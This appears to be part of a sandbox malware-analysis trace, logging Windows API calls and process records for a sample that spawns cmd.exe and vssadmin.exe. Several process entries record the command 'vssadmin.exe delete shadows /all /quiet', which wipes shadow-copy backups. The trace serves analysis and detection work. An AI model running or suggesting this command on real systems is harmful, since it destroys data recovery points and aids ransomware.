0x2d0000 [0072.814] GetProcessHeap () returned 0x2d0000 [0072.814] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5b30) returned 1 [0072.814] GetProcessHeap () returned 0x2d0000 [0072.814] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e5b30) returned 0x20 [0072.814] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5b30 | out: hHeap=0x2d0000) returned 1 [0072.814] GetProcessHeap () returned 0x2d0000 [0072.814] GetProcessHeap () returned 0x2d0000 [0072.814] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5b60) returned 1 [0072.814] GetProcessHeap () returned 0x2d0000 [0072.814] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e5b60) returned 0x20 [0072.814] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5b60 | out: hHeap=0x2d0000) returned 1 [0072.814] GetProcessHeap () returned 0x2d0000 [0072.814] GetProcessHeap () returned 0x2d0000 [0072.814] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eb690) returned 1 [0072.815] GetProcessHeap () returned 0x2d0000 [0072.815] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2eb690) returned 0x18 [0072.815] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eb690 | out: hHeap=0x2d0000) returned 1 [0072.815] GetProcessHeap () returned 0x2d0000 [0072.815] GetProcessHeap () returned 0x2d0000 [0072.815] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5b90) returned 1 [0072.815] GetProcessHeap () returned 0x2d0000 [0072.815] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e5b90) returned 0x20 [0072.815] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5b90 | out: hHeap=0x2d0000) returned 1 [0072.815] GetProcessHeap () returned 0x2d0000 [0072.815] GetProcessHeap () returned 0x2d0000 [0072.815] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5c20) returned 1 [0072.815] GetProcessHeap () returned 0x2d0000 [0072.815] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e5c20) returned 0x20 [0072.815] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5c20 | out: hHeap=0x2d0000) returned 1 [0072.815] GetProcessHeap () returned 0x2d0000 [0072.815] GetProcessHeap () returned 0x2d0000 [0072.815] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5cb0) returned 1 [0072.815] GetProcessHeap () returned 0x2d0000 [0072.815] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e5cb0) returned 0x20 [0072.815] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5cb0 | out: hHeap=0x2d0000) returned 1 [0072.815] GetProcessHeap () returned 0x2d0000 [0072.815] GetProcessHeap () returned 0x2d0000 [0072.815] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eb6b0) returned 1 [0072.815] GetProcessHeap () returned 0x2d0000 [0072.815] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2eb6b0) returned 0x18 [0072.815] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eb6b0 | out: hHeap=0x2d0000) returned 1 [0072.815] GetProcessHeap () returned 0x2d0000 [0072.815] GetProcessHeap () returned 0x2d0000 [0072.815] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5c50) returned 1 [0072.815] GetProcessHeap () returned 0x2d0000 [0072.815] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e5c50) returned 0x20 [0072.815] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5c50 | out: hHeap=0x2d0000) returned 1 [0072.815] GetProcessHeap () returned 0x2d0000 [0072.815] GetProcessHeap () returned 0x2d0000 [0072.815] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eb630) returned 1 [0072.815] GetProcessHeap () returned 0x2d0000 [0072.815] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2eb630) returned 0x18 [0072.816] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eb630 | out: hHeap=0x2d0000) returned 1 [0072.816] exit (_Code=0) Process: id = "5" image_name = "vssadmin.exe" filename = "c:\\windows\\system32\\vssadmin.exe" page_root = "0x3d944000" os_pid = "0x834" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x730" cmd_line = "vssadmin.exe delete shadows /all /quiet" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 10 os_tid = 0x844 Thread: id = 11 os_tid = 0x854 Thread: id = 12 os_tid = 0x864 Thread: id = 13 os_tid = 0x874 Thread: id = 14 os_tid = 0x884 Process: id = "6" image_name = "vssvc.exe" filename = "c:\\windows\\system32\\vssvc.exe" page_root = "0x3de19000" os_pid = "0x894" os_integrity_level = "0x4000" os_privileges = "0xe60b7e890" monitor_reason = "rpc_server" parent_id = "5" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\vssvc.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\VSS" [0xe], "NT AUTHORITY\\Logon Session 00000000:0005a511" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 15 os_tid = 0x984 Thread: id = 16 os_tid = 0x974 Thread: id = 17 os_tid = 0x964 Thread: id = 18 os_tid = 0x954 [0075.113] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf5d9c0 | out: lpSystemTimeAsFileTime=0xf5d9c0*(dwLowDateTime=0x7b37e980, dwHighDateTime=0x1d6b3a2)) [0075.114] GetCurrentProcessId () returned 0x894 [0075.115] GetCurrentThreadId () returned 0x954 [0075.115] GetTickCount () returned 0x1147f00 [0075.115] QueryPerformanceCounter (in: lpPerformanceCount=0xf5d9c8 | out: lpPerformanceCount=0xf5d9c8*=19222076066) returned 1 [0075.120] malloc (_Size=0x100) returned 0x108e80 [0169.660] free (_Block=0x108e80) Thread: id = 19 os_tid = 0x944 Thread: id = 20 os_tid = 0x934 Thread: id = 21 os_tid = 0x8a4 Thread: id = 22 os_tid = 0x9c4 Thread: id = 29 os_tid = 0xb90 Thread: id = 219 os_tid = 0xb20 Process: id = "7" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x3c31f000" os_pid = "0x9a4" os_integrity_level = "0x4000" os_privileges = "0x60814080" monitor_reason = "rpc_server" parent_id = "6" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k swprv" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\swprv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0005ade4" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 23 os_tid = 0x5b8 Thread: id = 24 os_tid = 0xa04 Thread: id = 25 os_tid = 0x9f4 Thread: id = 26 os_tid = 0x9e4 Thread: id = 27 os_tid = 0x9d4 Thread: id = 28 os_tid = 0x9b4 Thread: id = 38 os_tid = 0xb04 Thread: id = 220 os_tid = 0x754 Process: id = "8" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x6e99b000" os_pid = "0xb24" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x7a4" cmd_line = "\"cmd.exe\" /c vssadmin.exe delete shadows /all /quiet" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 30 os_tid = 0xb6c [0114.048] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30fbf0 | out: lpSystemTimeAsFileTime=0x30fbf0*(dwLowDateTime=0x90ca5f80, dwHighDateTime=0x1d6b3a2)) [0114.048] GetCurrentProcessId () returned 0xb24 [0114.048] GetCurrentThreadId () returned 0xb6c [0114.048] GetTickCount () returned 0x1150c60 [0114.048] QueryPerformanceCounter (in: lpPerformanceCount=0x30fbf8 | out: lpPerformanceCount=0x30fbf8*=23115396422) returned 1 [0114.050] GetModuleHandleW (lpModuleName=0x0) returned 0x4a680000 [0114.050] __set_app_type (_Type=0x1) [0114.050] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a6a7810) returned 0x0 [0114.051] __getmainargs (in: _Argc=0x4a6ca608, _Argv=0x4a6ca618, _Env=0x4a6ca610, _DoWildCard=0, _StartInfo=0x4a6ae0f4 | out: _Argc=0x4a6ca608, _Argv=0x4a6ca618, _Env=0x4a6ca610) returned 0 [0114.051] GetCurrentThreadId () returned 0xb6c [0114.051] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb6c) returned 0x3c [0114.051] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0114.051] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0114.051] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0114.052] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0114.052] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x30fb88 | out: phkResult=0x30fb88*=0x0) returned 0x2 [0114.052] VirtualQuery (in: lpAddress=0x30fb70, lpBuffer=0x30faf0, dwLength=0x30 | out: lpBuffer=0x30faf0*(BaseAddress=0x30f000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0114.052] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x30faf0, dwLength=0x30 | out: lpBuffer=0x30faf0*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0114.052] VirtualQuery (in: lpAddress=0x211000, lpBuffer=0x30faf0, dwLength=0x30 | out: lpBuffer=0x30faf0*(BaseAddress=0x211000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0114.052] VirtualQuery (in: lpAddress=0x214000, lpBuffer=0x30faf0, dwLength=0x30 | out: lpBuffer=0x30faf0*(BaseAddress=0x214000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0114.052] VirtualQuery (in: lpAddress=0x310000, lpBuffer=0x30faf0, dwLength=0x30 | out: lpBuffer=0x30faf0*(BaseAddress=0x310000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0xb0000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30 [0114.052] GetConsoleOutputCP () returned 0x1b5 [0114.052] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a6bbfe0 | out: lpCPInfo=0x4a6bbfe0) returned 1 [0114.053] SetConsoleCtrlHandler (HandlerRoutine=0x4a6a3184, Add=1) returned 1 [0114.053] _get_osfhandle (_FileHandle=1) returned 0x33c [0114.053] SetConsoleMode (hConsoleHandle=0x33c, dwMode=0x0) returned 0 [0114.053] _get_osfhandle (_FileHandle=1) returned 0x33c [0114.053] GetConsoleMode (in: hConsoleHandle=0x33c, lpMode=0x4a6ae194 | out: lpMode=0x4a6ae194) returned 0 [0114.053] _get_osfhandle (_FileHandle=0) returned 0xfffffffffffffffe [0114.053] GetConsoleMode (in: hConsoleHandle=0xfffffffffffffffe, lpMode=0x4a6ae198 | out: lpMode=0x4a6ae198) returned 1 [0114.054] _get_osfhandle (_FileHandle=0) returned 0xfffffffffffffffe [0114.054] SetConsoleMode (hConsoleHandle=0xfffffffffffffffe, dwMode=0x7) returned 0 [0114.054] GetEnvironmentStringsW () returned 0x88a60* [0114.055] GetProcessHeap () returned 0x70000 [0114.055] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0xa7c) returned 0x894f0 [0114.055] FreeEnvironmentStringsW (penv=0x88a60) returned 1 [0114.055] GetProcessHeap () returned 0x70000 [0114.055] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x8) returned 0x888e0 [0114.055] GetEnvironmentStringsW () returned 0x88a60* [0114.055] GetProcessHeap () returned 0x70000 [0114.055] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0xa7c) returned 0x89f80 [0114.055] FreeEnvironmentStringsW (penv=0x88a60) returned 1 [0114.055] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30ea48 | out: phkResult=0x30ea48*=0x44) returned 0x0 [0114.631] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30ea40, lpData=0x30ea60, lpcbData=0x30ea44*=0x1000 | out: lpType=0x30ea40*=0x0, lpData=0x30ea60*=0x18, lpcbData=0x30ea44*=0x1000) returned 0x2 [0114.631] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30ea40, lpData=0x30ea60, lpcbData=0x30ea44*=0x1000 | out: lpType=0x30ea40*=0x4, lpData=0x30ea60*=0x1, lpcbData=0x30ea44*=0x4) returned 0x0 [0114.631] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30ea40, lpData=0x30ea60, lpcbData=0x30ea44*=0x1000 | out: lpType=0x30ea40*=0x0, lpData=0x30ea60*=0x1, lpcbData=0x30ea44*=0x1000) returned 0x2 [0114.631] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30ea40, lpData=0x30ea60, lpcbData=0x30ea44*=0x1000 | out: lpType=0x30ea40*=0x4, lpData=0x30ea60*=0x0, lpcbData=0x30ea44*=0x4) returned 0x0 [0114.631] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30ea40, lpData=0x30ea60, lpcbData=0x30ea44*=0x1000 | out: lpType=0x30ea40*=0x4, lpData=0x30ea60*=0x40, lpcbData=0x30ea44*=0x4) returned 0x0 [0114.631] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30ea40, lpData=0x30ea60, lpcbData=0x30ea44*=0x1000 | out: lpType=0x30ea40*=0x4, lpData=0x30ea60*=0x40, lpcbData=0x30ea44*=0x4) returned 0x0 [0114.631] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30ea40, lpData=0x30ea60, lpcbData=0x30ea44*=0x1000 | out: lpType=0x30ea40*=0x0, lpData=0x30ea60*=0x40, lpcbData=0x30ea44*=0x1000) returned 0x2 [0114.631] RegCloseKey (hKey=0x44) returned 0x0 [0114.632] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30ea48 | out: phkResult=0x30ea48*=0x44) returned 0x0 [0114.632] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30ea40, lpData=0x30ea60, lpcbData=0x30ea44*=0x1000 | out: lpType=0x30ea40*=0x0, lpData=0x30ea60*=0x40, lpcbData=0x30ea44*=0x1000) returned 0x2 [0114.632] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30ea40, lpData=0x30ea60, lpcbData=0x30ea44*=0x1000 | out: lpType=0x30ea40*=0x4, lpData=0x30ea60*=0x1, lpcbData=0x30ea44*=0x4) returned 0x0 [0114.632] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30ea40, lpData=0x30ea60, lpcbData=0x30ea44*=0x1000 | out: lpType=0x30ea40*=0x0, lpData=0x30ea60*=0x1, lpcbData=0x30ea44*=0x1000) returned 0x2 [0114.632] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30ea40, lpData=0x30ea60, lpcbData=0x30ea44*=0x1000 | out: lpType=0x30ea40*=0x4, lpData=0x30ea60*=0x0, lpcbData=0x30ea44*=0x4) returned 0x0 [0114.632] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30ea40, lpData=0x30ea60, lpcbData=0x30ea44*=0x1000 | out: lpType=0x30ea40*=0x4, lpData=0x30ea60*=0x9, lpcbData=0x30ea44*=0x4) returned 0x0 [0114.632] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30ea40, lpData=0x30ea60, lpcbData=0x30ea44*=0x1000 | out: lpType=0x30ea40*=0x4, lpData=0x30ea60*=0x9, lpcbData=0x30ea44*=0x4) returned 0x0 [0114.632] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30ea40, lpData=0x30ea60, lpcbData=0x30ea44*=0x1000 | out: lpType=0x30ea40*=0x0, lpData=0x30ea60*=0x9, lpcbData=0x30ea44*=0x1000) returned 0x2 [0114.632] RegCloseKey (hKey=0x44) returned 0x0 [0114.632] time (in: timer=0x0 | out: timer=0x0) returned 0x5fa44629 [0114.632] srand (_Seed=0x5fa44629) [0114.632] GetCommandLineW () returned="\"cmd.exe\" /c vssadmin.exe delete shadows /all /quiet" [0114.632] GetCommandLineW () returned="\"cmd.exe\" /c vssadmin.exe delete shadows /all /quiet" [0114.633] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a6bc0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0114.633] GetProcessHeap () returned 0x70000 [0114.633] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x218) returned 0x8aa10 [0114.633] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x8aa20, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0114.633] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a6af360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0114.633] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a6af360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0114.633] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a6af360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0114.633] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0114.633] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0114.633] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0114.633] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0114.633] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0114.633] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0114.633] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0114.633] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0114.634] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0114.634] GetProcessHeap () returned 0x70000 [0114.634] HeapFree (in: hHeap=0x70000, dwFlags=0x0, lpMem=0x894f0 | out: hHeap=0x70000) returned 1 [0114.634] GetEnvironmentStringsW () returned 0x88a60* [0114.634] GetProcessHeap () returned 0x70000 [0114.634] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0xa94) returned 0x8b6d0 [0114.634] FreeEnvironmentStringsW (penv=0x88a60) returned 1 [0114.634] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a6af360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0114.634] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a6af360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0114.634] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0114.634] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0114.634] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0114.634] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0114.634] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0114.634] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0114.635] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0114.635] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0114.635] GetProcessHeap () returned 0x70000 [0114.635] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x5c) returned 0x71320 [0114.635] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x30f850 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0114.635] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x30f850, lpFilePart=0x30f830 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x30f830*="Desktop") returned 0x25 [0114.635] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0114.635] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x30f560 | out: lpFindFileData=0x30f560*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xe60000e6, cFileName="Users", cAlternateFileName="")) returned 0x71390 [0114.635] FindClose (in: hFindFile=0x71390 | out: hFindFile=0x71390) returned 1 [0114.635] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x30f560 | out: lpFindFileData=0x30f560*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xe60000e6, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x71390 [0114.636] FindClose (in: hFindFile=0x71390 | out: hFindFile=0x71390) returned 1 [0114.636] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0114.636] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x30f560 | out: lpFindFileData=0x30f560*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6db47080, ftLastAccessTime.dwHighDateTime=0x1d6b3a2, ftLastWriteTime.dwLowDateTime=0x6db47080, ftLastWriteTime.dwHighDateTime=0x1d6b3a2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xe60000e6, cFileName="Desktop", cAlternateFileName="")) returned 0x71390 [0114.636] FindClose (in: hFindFile=0x71390 | out: hFindFile=0x71390) returned 1 [0114.636] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0114.636] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0114.636] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0114.636] GetProcessHeap () returned 0x70000 [0114.636] HeapFree (in: hHeap=0x70000, dwFlags=0x0, lpMem=0x8b6d0 | out: hHeap=0x70000) returned 1 [0114.636] GetEnvironmentStringsW () returned 0x88a60* [0114.636] GetProcessHeap () returned 0x70000 [0114.636] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0xae8) returned 0x8ac30 [0114.636] FreeEnvironmentStringsW (penv=0x88a60) returned 1 [0114.636] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a6bc0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0114.637] GetProcessHeap () returned 0x70000 [0114.637] HeapFree (in: hHeap=0x70000, dwFlags=0x0, lpMem=0x71320 | out: hHeap=0x70000) returned 1 [0114.637] GetProcessHeap () returned 0x70000 [0114.637] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x4016) returned 0x8cc60 [0114.637] GetProcessHeap () returned 0x70000 [0114.637] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x64) returned 0x8b720 [0114.637] GetProcessHeap () returned 0x70000 [0114.637] HeapFree (in: hHeap=0x70000, dwFlags=0x0, lpMem=0x8cc60 | out: hHeap=0x70000) returned 1 [0114.637] GetConsoleOutputCP () returned 0x1b5 [0114.638] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a6bbfe0 | out: lpCPInfo=0x4a6bbfe0) returned 1 [0114.638] GetUserDefaultLCID () returned 0x409 [0114.638] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a6b7b50, cchData=8 | out: lpLCData=":") returned 2 [0114.638] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x30f960, cchData=128 | out: lpLCData="0") returned 2 [0114.638] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x30f960, cchData=128 | out: lpLCData="0") returned 2 [0114.638] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x30f960, cchData=128 | out: lpLCData="1") returned 2 [0114.638] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a6ca740, cchData=8 | out: lpLCData="/") returned 2 [0114.639] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a6ca4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0114.639] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a6ca460, cchData=32 | out: lpLCData="Tue") returned 4 